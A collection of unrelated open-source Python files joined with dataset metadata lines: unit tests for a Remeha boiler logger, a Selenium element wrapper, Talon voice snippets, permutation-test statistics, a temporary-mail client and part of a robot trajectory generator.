                               0x47, 0x00, 0x00, 0x13, 0xc6, 0x40, 0x05, 0x03,
                               0xff, 0xff, 0x1e, 0x30, 0x0f, 0x04, 0xff, 0xff,
                               0x00, 0xc0, 0x4e, 0x12, 0x00, 0x00, 0x00, 0x00,
                               0x80, 0x47, 0x03, 0x40, 0x35, 0x00, 0x00, 0x17,
                               0xef, 0x03])
    def setUp(self):
        # Fresh temp directory per test; cleaned up in tearDown.
        self.test_config_directory = tempfile.TemporaryDirectory()
    def tearDown(self):
        self.test_config_directory.cleanup()
    def test_read_config(self):
        """A valid JSON config pointed to by REMEHA_CONF is parsed."""
        test_config_path = os.path.join(self.test_config_directory.name, 'test_config.json')
        test_config = open(test_config_path, mode='w+')
        with mock.patch.dict('os.environ', {'REMEHA_CONF': test_config.name}):
            test_config.write('{ "database_logger": { "host": "testserver.local", "user_name": "database_user", "password": "<PASSWORD>" } }')
            test_config.close()
            config = read_config()
            assert 'database_logger' in config
    def test_read_config_does_not_crash_on_unreadable_config(self):
        """Malformed JSON (missing closing brace) yields None, not an exception."""
        test_config_path = os.path.join(self.test_config_directory.name, 'test_config.json')
        test_config = open(test_config_path, mode='w+')
        with mock.patch.dict('os.environ', {'REMEHA_CONF': test_config.name}):
            test_config.write('{ "database_logger": { "host": "testserver.local", "user_name": "database_user", "password": "<PASSWORD>" } ')
            test_config.close()
            config = read_config()
            assert config is None
    def test_read_default_config_if_REMEHA_CONF_not_set(self):
        # With an empty environment the default config path must still load.
        with mock.patch.dict('os.environ', clear=True):
            config = read_config()
            assert config is not None
    def test_filelogger_does_nothing_if_configured_off(self):
        # No config and no explicit filename -> logging disabled entirely.
        with mock.patch('remeha.csv') as csv_mock:
            file_logger = FileLogger(None, None)
            file_logger.log_data(self.raw_test_data)
            csv_mock.writer.assert_not_called()
    def test_filelogger_uses_filename_if_provided(self):
        with mock.patch('remeha.csv') as csv_mock:
            with tempfile.TemporaryDirectory() as temp_dir:
                file_name = temp_dir + '/test.csv'
                file_logger = FileLogger(None, file_name)
                file_logger.log_data(Frame(frame_data=TestRemeha.raw_test_data))
                file_logger.close()
                assert os.path.exists(file_name)
                csv_mock.writer.assert_called()
    def test_filelogger_uses_config_path_if_provided(self):
        with tempfile.TemporaryDirectory() as temp_dir:
            file_name = temp_dir + '/test.csv'
            file_logger = FileLogger(json.loads('{"enabled": true, "path": "%s"}' % file_name), None)
            file_logger.log_data(Frame(frame_data=TestRemeha.raw_test_data))
            file_logger.close()
            assert os.path.exists(file_name)
    def test_filelogger_no_file_logging_if_disabled_in_config(self):
        with tempfile.TemporaryDirectory() as temp_dir:
            file_name = temp_dir + '/test.csv'
            file_logger = FileLogger(json.loads('{"enabled": false, "path": "%s"}' % file_name), None)
            file_logger.log_data(Frame(frame_data=TestRemeha.raw_test_data))
            file_logger.close()
            assert not os.path.exists(file_name)
    def test_filelogger_commandline_parameter_overwrites_config_path(self):
        # An explicit filename argument must take precedence over the config path.
        with tempfile.TemporaryDirectory() as temp_dir:
            expected_file_name = temp_dir + '/test.csv'
            not_expected_file_name = temp_dir + '/test2.csv'
            file_logger = FileLogger(json.loads('{"enabled": true, "path": "%s"}' % not_expected_file_name), expected_file_name)
            file_logger.log_data(Frame(frame_data=TestRemeha.raw_test_data))
            file_logger.close()
            assert not os.path.exists(not_expected_file_name)
            assert os.path.exists(expected_file_name)
| 2.21875 | 2 |
common/_webdriver_qa_api/core/selenium_dynamic_elements.py | albalabkin/PyCats | 0 | 12767427 | <reponame>albalabkin/PyCats<filename>common/_webdriver_qa_api/core/selenium_dynamic_elements.py
import logging
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException
logger = logging.getLogger(__name__)
class DynamicElement:
    """Lazy wrapper around a Selenium element.

    The element is re-located on every access (via the ``selenium_element``
    property), so the wrapper survives page reloads and DOM updates that
    would make a cached WebElement stale. Unknown attribute/method accesses
    are forwarded to the freshly located WebElement and logged.
    """
    def __init__(self, locator_type, locator, driver, name=None, parent=None):
        # parent, when given, is expected to be another DynamicElement:
        # self.__parent() locates the parent element first and the search
        # for this element is scoped to it.
        self.__driver = driver
        self.__locator_type = locator_type
        self.__locator = locator
        self.__name = locator if name is None else name
        self.__parent = parent
    @property
    def name(self):
        # Human-readable name used in log messages (falls back to the locator).
        return self.__name
    @property
    def selenium_element(self):
        """Locate and return the underlying WebElement (or None if not found).

        NOTE(review): on NoSuchElementException the error is logged and the
        property implicitly returns None -- callers then fail with an
        AttributeError/NoneType error rather than the original exception.
        Confirm this is intended.
        """
        if self.__parent is None:
            try:
                logger.info(f"Looking for element {self.__locator}")
                return self.__driver.find_element(self.__locator_type, self.__locator)
            except NoSuchElementException:
                logger.exception("An element '{0}' {1}could not be located on the page.".format(
                    self.__name, "" if self.__locator == self.__name else "with locator '{}' ".format(self.__locator)))
        else:
            try:
                return self.__parent().find_element(self.__locator_type, self.__locator)
            except NoSuchElementException:
                logger.exception("An element '{0}' {1}for __parent '{2}' could not be located on the page.".format(
                    self.__name, "" if self.__locator == self.__name else "with locator '{}' ".format(self.__locator),
                    self.__parent.name))
    def __log(self, item, attribute):
        # Log whether a forwarded access was a method call or a plain attribute.
        # Uses object.__getattribute__ to avoid re-triggering our own hooks.
        name = object.__getattribute__(self, "name")
        if callable(attribute):
            logger.info(f"Call method {item} in element {name}")
        else:
            logger.info(f"get attribute {item} in element {name}")
    def __call__(self):
        # Calling the wrapper locates and returns the raw WebElement.
        return self.selenium_element
    def __getattribute__(self, item):
        # Intercept *every* attribute access for logging; private
        # (_DynamicElement__*) names are exempt to avoid infinite recursion.
        attribute = object.__getattribute__(self, item)
        if "_DynamicElement__" not in item:
            object.__getattribute__(self, "_DynamicElement__log")(
                item, attribute)
            logger.info(f"attribute getattribute {attribute} {item}")
        return attribute
    def __getattr__(self, item):
        # Fallback for names not defined on the wrapper: forward to the
        # WebElement, retrying once if the element reference went stale.
        try:
            attribute = getattr(self.selenium_element, item)
        except StaleElementReferenceException:
            attribute = getattr(self.selenium_element, item)
        object.__getattribute__(self, "_DynamicElement__log")(item, attribute)
        logger.info(f"attribute getattr {attribute}")
        return attribute
class DynamicElements(DynamicElement):
    """Like DynamicElement, but locates *all* matching elements (find_elements)."""
    def __init__(self, locator_type, locator, driver, name=None,
                 parent=None):
        # Stored twice (plain attributes here, name-mangled ones in the base
        # class) because the overriding selenium_element property below
        # cannot reach the base class's private attributes.
        self.parent = parent
        self.driver = driver
        self.locator_type = locator_type
        self.locator = locator
        super().__init__(locator_type, locator, driver, name=name,
                         parent=parent)
    @property
    def selenium_element(self):
        # Returns a (possibly empty) list of WebElements, scoped to the
        # parent element when one was supplied.
        if self.parent is None:
            return self.driver.find_elements(self.locator_type, self.locator)
        else:
            return self.parent().find_elements(self.locator_type, self.locator)
| 2.53125 | 3 |
apps/vim/plugins/ultisnips/python_snippets.py | codecat555/codecat555-fidgetingbits_knausj_talon | 1 | 12767428 | from talon import Context
# Talon context: active only in Python files when the ultisnips tag is on.
ctx = Context()
ctx.matches = r"""
tag: user.vim_ultisnips
mode: user.python
mode: command
and code.language: python
"""
# spoken name -> snippet name
ultisnips_snippets = {
    "header": "#!",
    "if main": "ifmain",
    "for loop": "for",
    "class": "class",
    "function": "def",
    "method": "deff",
    "class method": "defc",
    "static method": "defs",
    "from": "from",
    "if": "if",
    "if else": "ife",
    "if if else": "ifee",
    "try": "try",
    "try except": "trye",
    "finally": "tryf",
    "trip string": '"',
    "trip tick": "'",
}
# Personal/custom snippets, merged with the stock UltiSnips ones below.
private_snippets = {
    "print success": "psuccess",
    "print fail": "pfail",
    "dick string": "dstr",
    "dick format string": "dfstr",
    "new arg parser": "argparse",
    "add argument": "narg",
    "dock param": "dockparam",
}
ctx.lists["user.snippets"] = {**ultisnips_snippets, **private_snippets}
| 2.3125 | 2 |
analysis_layer/test_permutation.py | tpimentelms/phonotactic-complexity | 5 | 12767429 | <reponame>tpimentelms/phonotactic-complexity
import numpy as np
def paired_permutation_test(art, norm, verbose=True):
    """Exact two-sided paired permutation (sign-flip) test.

    Enumerates all 2^len(art) sign assignments of the paired differences and
    returns the fraction whose absolute mean is at least the observed one
    (the p-value). Exponential in len(art) -- only use for small samples.
    """
    diffs = [art[i] - norm[i] for i in range(len(art))]
    observed = np.abs(np.mean(diffs))
    total = 2 ** len(art)
    count = 0
    for mask in range(total):
        # Bit k of the mask decides whether difference k keeps its sign.
        signed = [d if (mask >> k) & 1 else -d for k, d in enumerate(diffs)]
        if np.abs(np.mean(signed)) >= observed:
            count += 1
    if verbose:
        print(diffs)
        print(count, count / total)
    return count / total
def paired_permutation_test_partial(art, norm, ntests=10000, verbose=True):
    """Monte-Carlo (approximate) two-sided paired permutation test.

    Draws *ntests* random sign assignments of the paired differences instead
    of enumerating all 2^n of them; returns the estimated p-value.

    Fix: removed the dead zero-padding line inherited from the exact
    version -- the random sign vector already has length len(art), so the
    padding list was always empty.
    """
    diffs = [art[i] - norm[i] for i in range(len(art))]
    observed = np.abs(np.mean(diffs))
    count = 0
    for _ in range(ntests):
        keep_sign = np.random.uniform(0, 1, size=(len(art))) > 0.5
        permuted_mean = np.abs(np.mean([x if j else -x for x, j in zip(diffs, keep_sign)]))
        if permuted_mean >= observed:
            count += 1
    if verbose:
        print(count, count / ntests)
    return count / ntests
| 3.140625 | 3 |
DisMail/api/secmail/account.py | heisid/DisMail | 8 | 12767430 | from .classes import Inbox, Stash
from .inbox import get_inbox, read_mail
class SecmailAccount(object):
    """A 1secmail-style throwaway mailbox with a paginated local inbox cache."""
    def __init__(self, email):
        # email is expected as "login@domain"; raises ValueError otherwise.
        self.pagination = 0  # current page index (0-based)
        self.email = email
        self.login, self.domain = email.split('@')
        self.inbox = list()  # replaced by an Inbox instance after refresh()
    def refresh(self):
        """Re-fetch the inbox from the API and rebuild the local Stash list."""
        inbox = get_inbox(self.login, self.domain)
        stashes = list()
        for i, mail in enumerate(inbox, start=1):
            newStash = Stash(
                mail["id"], mail["from"],
                mail["subject"], mail["date"]
            )
            newStash.position = i  # 1-based display position
            stashes.append(newStash)
        self.inbox = Inbox(stashes)
    def get_max_page(self, amount=5):
        """Number of pages needed at *amount* mails per page (ceil division)."""
        retval = len(self.inbox.stashes) // amount
        if len(self.inbox.stashes) % amount != 0:
            retval += 1
        return retval
    def get_inbox(self, pagination=None, amount=5):
        """Return one page of stashes, clamping the page index into range."""
        if pagination is not None:
            self.pagination = pagination
        # Clamp value
        self.pagination = max(min(self.pagination, self.get_max_page()-1), 0)
        start = self.pagination * amount
        end = start + amount
        return self.inbox[start:end]
    def get_mail(self, index):
        """Fetch the full body of the mail at *index* (clamped to the inbox)."""
        index = abs(index)
        if index >= len(self.inbox.stashes):
            index = len(self.inbox.stashes) - 1
        return read_mail(self.login, self.domain, self.inbox[index].id)
    def test(self):
        # Ad-hoc manual smoke test of the Inbox filter helpers; assumes the
        # inbox has been refreshed and is non-empty.
        from datetime import datetime
        print("Get By Id")
        print(self.inbox.get_by_id(self.inbox[0].id))
        print("Get by sender")
        print(self.inbox.filter_by_sender(self.inbox[0].sender))
        print("Get by subject")
        print(self.inbox.filter_by_subject(self.inbox[0].subject))
        print("Get by word in subject")
        print(self.inbox.filter_by_word_in_subject(self.inbox[0].subject.split(' ')[0]))
        start = self.inbox[0].date
        end = datetime.max
        print(self.inbox.filter_by_date(start, end))
| 2.578125 | 3 |
src/adherent/trajectory_generation/trajectory_generator.py | ami-iit/paper_viceconte_2021_ral_adherent | 6 | 12767431 | <gh_stars>1-10
# SPDX-FileCopyrightText: <NAME> Italiano di Tecnologia
# SPDX-License-Identifier: BSD-3-Clause
# Use tf version 2.3.0 as 1.x
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import os
import math
import json
import yarp
import numpy as np
from typing import List, Dict
from scenario import gazebo as scenario
from dataclasses import dataclass, field
from gym_ignition.rbd.idyntree import numpy
from gym_ignition.rbd.conversions import Rotation
from gym_ignition.rbd.conversions import Transform
from adherent.MANN.utils import denormalize
from gym_ignition.rbd.conversions import Quaternion
from adherent.MANN.utils import read_from_file
from adherent.data_processing.utils import iCub
from gym_ignition.rbd.idyntree import kindyncomputations
from adherent.data_processing.utils import rotation_2D
from adherent.trajectory_generation.utils import trajectory_blending
from adherent.trajectory_generation.utils import load_output_mean_and_std
from adherent.trajectory_generation.utils import compute_angle_wrt_x_positive_semiaxis
from adherent.trajectory_generation.utils import load_component_wise_input_mean_and_std
import matplotlib as mpl
mpl.rcParams['toolbar'] = 'None'
import matplotlib.pyplot as plt
@dataclass
class StorageHandler:
    """Class to store all the quantities relevant in the trajectory generation pipeline and save data."""

    # Storage paths for the footsteps, postural, joystick input and blending coefficients
    footsteps_path: str
    postural_path: str
    joystick_input_path: str
    blending_coefficients_path: str

    # Storage dictionaries for footsteps, postural, joystick input and blending
    # coefficients. default_factory gives each instance its own fresh dict.
    footsteps: Dict = field(default_factory=lambda: {'l_foot': [], 'r_foot': []})
    posturals: Dict = field(default_factory=lambda: {'base': [], 'joints': [], 'links': [], 'com': []})
    joystick_inputs: Dict = field(default_factory=lambda: {'raw_data': [], 'quad_bezier': [], 'base_velocities': [], 'facing_dirs': []})
    blending_coeffs: Dict = field(default_factory=lambda: {'w_1': [], 'w_2': [], 'w_3': [], 'w_4': []})

    @staticmethod
    def build(storage_path: str) -> "StorageHandler":
        """Build an instance of StorageHandler with output files under *storage_path*."""
        # Storage paths for the footsteps, postural, joystick input and blending coefficients
        footsteps_path = os.path.join(storage_path, "footsteps.txt")
        postural_path = os.path.join(storage_path, "postural.txt")
        joystick_input_path = os.path.join(storage_path, "joystick_input.txt")
        blending_coefficients_path = os.path.join(storage_path, "blending_coefficients.txt")
        return StorageHandler(footsteps_path,
                              postural_path,
                              joystick_input_path,
                              blending_coefficients_path)

    def update_joystick_inputs_storage(self, raw_data: List, quad_bezier: List, base_velocities: List, facing_dirs: List) -> None:
        """Update the storage of the joystick inputs."""
        self.joystick_inputs["raw_data"].append(raw_data)
        self.joystick_inputs["quad_bezier"].append(quad_bezier)
        self.joystick_inputs["base_velocities"].append(base_velocities)
        self.joystick_inputs["facing_dirs"].append(facing_dirs)

    def update_blending_coefficients_storage(self, blending_coefficients: List) -> None:
        """Update the storage of the blending coefficients."""
        # blending_coefficients is assumed to be a 2-D array-like whose first
        # row holds the four expert weights -- TODO confirm against caller.
        self.blending_coeffs["w_1"].append(float(blending_coefficients[0][0]))
        self.blending_coeffs["w_2"].append(float(blending_coefficients[0][1]))
        self.blending_coeffs["w_3"].append(float(blending_coefficients[0][2]))
        self.blending_coeffs["w_4"].append(float(blending_coefficients[0][3]))

    def update_footsteps_storage(self, support_foot: str, footstep: Dict) -> None:
        """Add a footstep to the footsteps storage."""
        # support_foot must be one of the keys 'l_foot' / 'r_foot'.
        self.footsteps[support_foot].append(footstep)

    def replace_footsteps_storage(self, footsteps: Dict) -> None:
        """Replace the storage of footsteps with an updated footsteps list."""
        self.footsteps = footsteps

    def update_posturals_storage(self, base: Dict, joints: Dict, links: Dict, com: List) -> None:
        """Update the storage of the posturals."""
        self.posturals["base"].append(base)
        self.posturals["joints"].append(joints)
        self.posturals["links"].append(links)
        self.posturals["com"].append(com)

    def save_data_as_json(self) -> None:
        """Save all the stored data using the json format."""
        # Save footsteps
        with open(self.footsteps_path, 'w') as outfile:
            json.dump(self.footsteps, outfile)
        # Save postural
        with open(self.postural_path, 'w') as outfile:
            json.dump(self.posturals, outfile)
        # Save joystick inputs
        with open(self.joystick_input_path, 'w') as outfile:
            json.dump(self.joystick_inputs, outfile)
        # Save blending coefficients
        with open(self.blending_coefficients_path, 'w') as outfile:
            json.dump(self.blending_coeffs, outfile)
        # Debug
        # NOTE: this blocks on stdin; remove for non-interactive runs.
        input("\nData have been saved. Press Enter to continue the trajectory generation.")
@dataclass
class FootstepsExtractor:
"""Class to extract the footsteps from the generated trajectory."""
# Auxiliary variables for the footsteps update before saving
nominal_DS_duration: float
difference_position_threshold: float
# Auxiliary variables to handle the footsteps deactivation time
difference_height_norm_threshold: bool
waiting_for_deactivation_time: bool = False
    @staticmethod
    def build(nominal_DS_duration: float = 0.04,
              difference_position_threshold: float = 0.04,
              difference_height_norm_threshold: bool = 0.005) -> "FootstepsExtractor":
        """Build an instance of FootstepsExtractor.

        NOTE(review): difference_height_norm_threshold is annotated bool but
        used as a float threshold (meters) -- annotation looks wrong.
        """
        return FootstepsExtractor(nominal_DS_duration=nominal_DS_duration,
                                  difference_position_threshold=difference_position_threshold,
                                  difference_height_norm_threshold=difference_height_norm_threshold)
def should_update_footstep_deactivation_time(self, kindyn: kindyncomputations.KinDynComputations) -> bool:
"""Check whether the deactivation time of the last footstep needs to be updated."""
# Retrieve the transformation from the world frame to the base frame
world_H_base = kindyn.get_world_base_transform()
# Compute right foot height
base_H_r_foot = kindyn.get_relative_transform(ref_frame_name="root_link", frame_name="r_foot")
W_H_RF = world_H_base.dot(base_H_r_foot)
W_right_foot_pos = W_H_RF [0:3, -1]
right_foot_height = W_right_foot_pos[2]
# Compute left foot height
base_H_l_foot = kindyn.get_relative_transform(ref_frame_name="root_link", frame_name="l_foot")
W_H_LF = world_H_base.dot(base_H_l_foot)
W_left_foot_pos = W_H_LF[0:3, -1]
left_foot_height = W_left_foot_pos[2]
# Compute the difference in height between the feet
difference_height_norm = np.linalg.norm(left_foot_height - right_foot_height)
# If the height difference is above a threshold and a foot is being detached, the deactivation
# time of the last footstep related to the detaching foot needs to be updated
if self.waiting_for_deactivation_time and difference_height_norm > self.difference_height_norm_threshold:
self.waiting_for_deactivation_time = False
return True
return False
def create_new_footstep(self, kindyn: kindyncomputations.KinDynComputations,
support_foot: str, activation_time: float) -> Dict:
"""Retrieve the information related to a new footstep."""
new_footstep = {}
# Compute new footstep 3D and 2D position
world_H_base = kindyn.get_world_base_transform()
base_H_support_foot = kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=support_foot)
W_H_SF = world_H_base.dot(base_H_support_foot)
support_foot_pos = W_H_SF[0:3, -1]
support_foot_ground_pos = [support_foot_pos[0], support_foot_pos[1]]
new_footstep["3D_pos"] = list(support_foot_pos)
new_footstep["2D_pos"] = support_foot_ground_pos
# Compute new footstep 3D and 2D orientation
support_foot_quat = Quaternion.from_matrix(W_H_SF[0:3, 0:3])
W_R_SF = Rotation.from_quat(Quaternion.to_xyzw(np.asarray(support_foot_quat)))
W_RPY_SF = Rotation.as_euler(W_R_SF, 'xyz')
new_footstep["3D_orient"] = W_R_SF.as_matrix().tolist()
new_footstep["2D_orient"] = W_RPY_SF[2]
# Assign new footstep activation time
new_footstep["activation_time"] = activation_time
# Use a temporary flag indicating that the deactivation time has not been computed yet
new_footstep["deactivation_time"] = -1
# Set the flag indicating that the last footstep has no deactivation time yet accordingly
self.waiting_for_deactivation_time = True
return new_footstep
def update_footsteps(self, final_deactivation_time: float, footsteps: Dict) -> Dict:
"""Update the footsteps list before saving data by replacing temporary deactivation times (if any) and
merging footsteps which are too close each other in order to avoid unintended footsteps on the spot.
"""
# Update the deactivation time of the last footstep of each foot (they need to coincide to be processed
# properly in the trajectory control layer)
for foot in footsteps.keys():
footsteps[foot][-1]["deactivation_time"] = final_deactivation_time
# Replace temporary deactivation times in the footsteps list (if any)
updated_footsteps = self.replace_temporary_deactivation_times(footsteps=footsteps)
# Merge footsteps which are too close each other
updated_footsteps = self.merge_close_footsteps(final_deactivation_time=final_deactivation_time,
footsteps=updated_footsteps)
return updated_footsteps
def replace_temporary_deactivation_times(self, footsteps: Dict) -> Dict:
"""Replace temporary footstep deactivation times that may not have been updated properly."""
# Map from one foot to the other
other_foot = {"l_foot": "r_foot", "r_foot": "l_foot"}
for foot in ["l_foot","r_foot"]:
for footstep in footsteps[foot]:
# If a temporary footstep deactivation time is detected
if footstep["deactivation_time"] == -1:
# Retrieve the footstep activation time
current_activation_time = footstep["activation_time"]
for footstep_other_foot in footsteps[other_foot[foot]]:
# Retrieve the activation time of the next footstep of the other foot
other_foot_activation_time = footstep_other_foot["activation_time"]
if other_foot_activation_time > current_activation_time:
# Update the deactivation time so to have a double support (DS) phase of the nominal duration
current_deactivation_time = other_foot_activation_time + self.nominal_DS_duration
footstep["deactivation_time"] = current_deactivation_time
break
return footsteps
def merge_close_footsteps(self, final_deactivation_time: float, footsteps: Dict) -> Dict:
"""Merge footsteps that are too close each other in order to avoid unintended footsteps on the spot."""
# Initialize updated footsteps list
updated_footsteps = {"l_foot": [], "r_foot": []}
for foot in footsteps.keys():
# Auxiliary variable to handle footsteps update
skip_next_contact = False
for i in range(len(footsteps[foot]) - 1):
if skip_next_contact:
skip_next_contact = False
continue
# Compute the norm of the difference in position between consecutive footsteps of the same foot
current_footstep_position = np.array(footsteps[foot][i]["2D_pos"])
next_footstep_position = np.array(footsteps[foot][i + 1]["2D_pos"])
difference_position = np.linalg.norm(current_footstep_position - next_footstep_position)
if difference_position >= self.difference_position_threshold:
# Do not update footsteps which are not enough close each other
updated_footsteps[foot].append(footsteps[foot][i])
else:
# Merge footsteps which are close each other: the duration of the current footstep is extended
# till the end of the subsequent footstep
updated_footstep = footsteps[foot][i]
updated_footstep["deactivation_time"] = footsteps[foot][i + 1]["deactivation_time"]
updated_footsteps[foot].append(updated_footstep)
skip_next_contact = True
# If the last updated footstep ends before the final deactivation time, add the last original footstep
# to the updated list of footsteps
if updated_footsteps[foot][-1]["deactivation_time"] != final_deactivation_time:
updated_footsteps[foot].append(footsteps[foot][-1])
return updated_footsteps
@dataclass
class PosturalExtractor:
    """Class to extract the postural from the generated trajectory."""

    @staticmethod
    def build() -> "PosturalExtractor":
        """Build an instance of PosturalExtractor."""
        return PosturalExtractor()

    @staticmethod
    def create_new_posturals(base_position: List, base_quaternion: List, joint_positions: List, controlled_joints: List,
                             kindyn: kindyncomputations.KinDynComputations, link_names: List) -> (List, List, List, List):
        """Retrieve the information related to a new set of postural terms.

        Returns a tuple (base postural, joints postural, links postural, com postural).
        """
        # Store the postural term related to the base position and orientation
        # NOTE(review): "postion" is a typo, but it is a serialized dictionary key —
        # renaming it would change the saved data format consumed downstream; confirm before fixing
        new_base_postural = {"postion": list(base_position), "wxyz_quaternions": list(base_quaternion)}
        # Store the postural term related to the joint angles (joint name -> position)
        new_joints_postural = {controlled_joints[k]: joint_positions[k] for k in range(len(controlled_joints))}
        # Store the postural term related to the link orientations (world-frame quaternions)
        new_links_postural = {}
        world_H_base = kindyn.get_world_base_transform()
        for link_name in link_names:
            base_H_link = kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=link_name)
            world_H_link = world_H_base.dot(base_H_link)
            new_links_postural[link_name] = list(Quaternion.from_matrix(world_H_link[0:3, 0:3]))
        # Store the postural term related to the com positions
        new_com_postural = list(kindyn.get_com_position())
        return new_base_postural, new_joints_postural, new_links_postural, new_com_postural
@dataclass
class KinematicComputations:
    """Class for the kinematic computations exploited within the trajectory generation pipeline to compute
    kinematically-feasible base motions.
    """

    # Kinematics/dynamics helper configured with the robot model
    kindyn: kindyncomputations.KinDynComputations

    # Footsteps and postural extractors
    footsteps_extractor: FootstepsExtractor
    postural_extractor: PosturalExtractor

    # Simulated robot (for visualization only)
    icub: iCub
    controlled_joints: List
    gazebo: scenario.GazeboSimulator

    # Support foot and support vertex related quantities.
    # local_foot_vertices_pos holds the foot-frame positions of the 4 foot vertices,
    # indexed [FL, FR, BL, BR] as read in compute_W_vertices_pos
    local_foot_vertices_pos: List
    support_vertex_prev: int = 0
    support_vertex: int = 0
    support_foot_prev: str = "r_foot"
    support_foot: str = "r_foot"
    # NOTE(review): the three fields below are annotated float but are assigned 3D
    # positions (arrays/lists) at runtime — confirm the intended annotations
    support_foot_pos: float = 0
    support_vertex_pos: float = 0
    support_vertex_offset: float = 0

    @staticmethod
    def build(kindyn: kindyncomputations.KinDynComputations,
              local_foot_vertices_pos: List,
              icub: iCub,
              gazebo: scenario.GazeboSimulator,
              nominal_DS_duration: float = 0.04,
              difference_position_threshold: float = 0.04,
              difference_height_norm_threshold: bool = 0.005) -> "KinematicComputations":
        """Build an instance of KinematicComputations, creating the extractors internally."""
        footsteps_extractor = FootstepsExtractor.build(nominal_DS_duration=nominal_DS_duration,
                                                       difference_position_threshold=difference_position_threshold,
                                                       difference_height_norm_threshold=difference_height_norm_threshold)
        postural_extractor = PosturalExtractor.build()
        return KinematicComputations(kindyn=kindyn,
                                     footsteps_extractor=footsteps_extractor,
                                     postural_extractor=postural_extractor,
                                     local_foot_vertices_pos=local_foot_vertices_pos,
                                     icub=icub,
                                     controlled_joints=icub.joint_names(),
                                     gazebo=gazebo)

    def compute_W_vertices_pos(self) -> List:
        """Compute the feet vertices positions in the world (W) frame.

        Returns 8 positions ordered [RFL, RFR, RBL, RBR, LFL, LFR, LBL, LBR]; this
        ordering is relied upon by update_support_vertex_and_support_foot.
        """
        # Retrieve the transformation from the world to the base frame
        world_H_base = self.kindyn.get_world_base_transform()
        # Retrieve front-left (FL), front-right (FR), back-left (BL) and back-right (BR) vertices in the foot frame
        FL_vertex_pos = self.local_foot_vertices_pos[0]
        FR_vertex_pos = self.local_foot_vertices_pos[1]
        BL_vertex_pos = self.local_foot_vertices_pos[2]
        BR_vertex_pos = self.local_foot_vertices_pos[3]
        # Compute right foot (RF) transform w.r.t. the world (W) frame
        base_H_r_foot = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name="r_foot")
        W_H_RF = world_H_base.dot(base_H_r_foot)
        # Get the right-foot vertices positions in the world frame (homogeneous coordinates)
        W_RFL_vertex_pos_hom = W_H_RF @ np.concatenate((FL_vertex_pos, [1]))
        W_RFR_vertex_pos_hom = W_H_RF @ np.concatenate((FR_vertex_pos, [1]))
        W_RBL_vertex_pos_hom = W_H_RF @ np.concatenate((BL_vertex_pos, [1]))
        W_RBR_vertex_pos_hom = W_H_RF @ np.concatenate((BR_vertex_pos, [1]))
        # Convert homogeneous to cartesian coordinates
        W_RFL_vertex_pos = W_RFL_vertex_pos_hom[0:3]
        W_RFR_vertex_pos = W_RFR_vertex_pos_hom[0:3]
        W_RBL_vertex_pos = W_RBL_vertex_pos_hom[0:3]
        W_RBR_vertex_pos = W_RBR_vertex_pos_hom[0:3]
        # Compute left foot (LF) transform w.r.t. the world (W) frame
        base_H_l_foot = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name="l_foot")
        W_H_LF = world_H_base.dot(base_H_l_foot)
        # Get the left-foot vertices positions wrt the world frame
        W_LFL_vertex_pos_hom = W_H_LF @ np.concatenate((FL_vertex_pos, [1]))
        W_LFR_vertex_pos_hom = W_H_LF @ np.concatenate((FR_vertex_pos, [1]))
        W_LBL_vertex_pos_hom = W_H_LF @ np.concatenate((BL_vertex_pos, [1]))
        W_LBR_vertex_pos_hom = W_H_LF @ np.concatenate((BR_vertex_pos, [1]))
        # Convert homogeneous to cartesian coordinates
        W_LFL_vertex_pos = W_LFL_vertex_pos_hom[0:3]
        W_LFR_vertex_pos = W_LFR_vertex_pos_hom[0:3]
        W_LBL_vertex_pos = W_LBL_vertex_pos_hom[0:3]
        W_LBR_vertex_pos = W_LBR_vertex_pos_hom[0:3]
        # Store the positions of both right-foot and left-foot vertices in the world frame
        W_vertices_positions = [W_RFL_vertex_pos, W_RFR_vertex_pos, W_RBL_vertex_pos, W_RBR_vertex_pos,
                                W_LFL_vertex_pos, W_LFR_vertex_pos, W_LBL_vertex_pos, W_LBR_vertex_pos]
        return W_vertices_positions

    def set_initial_support_vertex_and_support_foot(self) -> None:
        """Compute initial support foot and support vertex positions in the world frame, along with the support vertex offset."""
        # Compute support foot position wrt the world frame
        world_H_base = self.kindyn.get_world_base_transform()
        base_H_SF = self.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name=self.support_foot)
        W_H_SF = world_H_base.dot(base_H_SF)
        W_support_foot_pos = W_H_SF[0:3, -1]
        # Compute support vertex position wrt the world frame
        F_support_vertex_pos = self.local_foot_vertices_pos[self.support_vertex]
        F_support_vertex_pos_hom = np.concatenate((F_support_vertex_pos, [1]))
        W_support_vertex_pos_hom = W_H_SF @ F_support_vertex_pos_hom
        W_support_vertex_pos = W_support_vertex_pos_hom[0:3]
        # Set initial support foot and support vertex positions, along with the support vertex offset
        # (the offset keeps only the ground-plane components; height is zeroed)
        self.support_foot_pos = W_support_foot_pos
        self.support_vertex_pos = W_support_vertex_pos
        self.support_vertex_offset = [W_support_vertex_pos[0], W_support_vertex_pos[1], 0]

    def reset_robot_configuration(self,
                                  joint_positions: List,
                                  base_position: List,
                                  base_quaternion: List) -> None:
        """Reset the robot configuration held by the kindyn object (not the simulator)."""
        # NOTE(review): `numpy.FromNumPy` suggests `numpy` here is an iDynTree bindings
        # conversion helper imported under that name, not the NumPy package — verify imports
        world_H_base = numpy.FromNumPy.to_idyntree_transform(
            position=np.array(base_position),
            quaternion=np.array(base_quaternion)).asHomogeneousTransform().toNumPy()
        self.kindyn.set_robot_state(s=joint_positions, ds=np.zeros(len(joint_positions)), world_H_base=world_H_base)

    def reset_visual_robot_configuration(self,
                                         joint_positions: List = None,
                                         base_position: List = None,
                                         base_quaternion: List = None) -> None:
        """Reset the configuration of the robot visualized in the simulator.

        Any argument left as None is simply not updated.
        """
        # Reset joint configuration
        if joint_positions is not None:
            self.icub.to_gazebo().reset_joint_positions(joint_positions, self.controlled_joints)
        # Reset base pose (full pose, orientation only, or position only)
        if base_position is not None and base_quaternion is not None:
            self.icub.to_gazebo().reset_base_pose(base_position, base_quaternion)
        elif base_quaternion is not None:
            self.icub.to_gazebo().reset_base_orientation(base_quaternion)
        elif base_position is not None:
            self.icub.to_gazebo().reset_base_position(base_position)
        # Step the simulator (visualization only)
        self.gazebo.run(paused=True)

    def compute_and_apply_kinematically_feasible_base_position(self,
                                                               joint_positions: List,
